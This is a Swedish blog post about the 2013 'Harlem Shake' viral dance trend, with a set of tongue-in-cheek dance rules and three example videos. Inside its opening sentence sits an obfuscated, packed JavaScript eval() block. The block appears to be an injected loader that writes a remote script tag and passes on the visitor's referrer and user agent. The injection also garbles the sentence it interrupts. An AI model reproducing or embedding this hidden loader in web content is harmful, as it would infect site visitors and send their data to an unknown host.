Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

[Youtube succé] Do the harlem shake

[Youtube succé] Do the harlem shake
Marcus
  • On 14 februari, 2013
  • http://www.revue.se

Gagnam eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dznar|var|u0026u|referrer|dzahf||js|php’.split(’|’),0,{}))
style skriker 2012.
En gammal fylledans vid namn The harlem shake har blivit en stor succé på nätet den senaste veckan. 

Dansen är inte precis ny, men uppmärksammades tidigare i veckan av att några uttråkade ungdomar från Sunshine Coast i Queensland gjorde en video där de gjorde sin tolkning av dansen. Deras video fick snabbt miljoner av visningar och stora som små youtubers världen över hakade på trenden.

Dansen går ut på att en grupp människor är inne i någon typ av syssla, exempelvis spelar dator. Helt plötslig börjar en av personerna att skaka på sig till låten Baauer – Harleem Shake. Detta är bara början av dansen, finalen går av stapeln när meningen ”Do the harlem shake” skriks ut i låten, då börjar de andra att dansa med som värsta galningarna.

Om ni själva vill haka på trenden så har jag lånat en liten regel-lista på vad man ska tänka på innan man gör dansen.

1. Huvudpersonen ska bära någon typ av mask.

2. Ingen får dansa samtidigt som huvudpersonen dansar.

3. När alla börjar dansa måste det finnas någon som får något typ av anfall.

4. Bli helt galna.

5. Gör inte någon transition som inte passar till musiken.

6. Var iallafall lite unika.

Här kommer 3 videoklipp som jag har valt ut där man dansar The harlem shake:

1. Den norska armén hakade snabbt på trenden

2. Inte bara vanliga människor hakade på trenden, utom även rapparen T-pain från Amerika.

3. Det nystartade svenska communityt Splay gjorde sin tolkning av stilen. I video ser vi stora youtubers som killarna från Ijustwanttobecool, Simon Lusseti och Tejbz.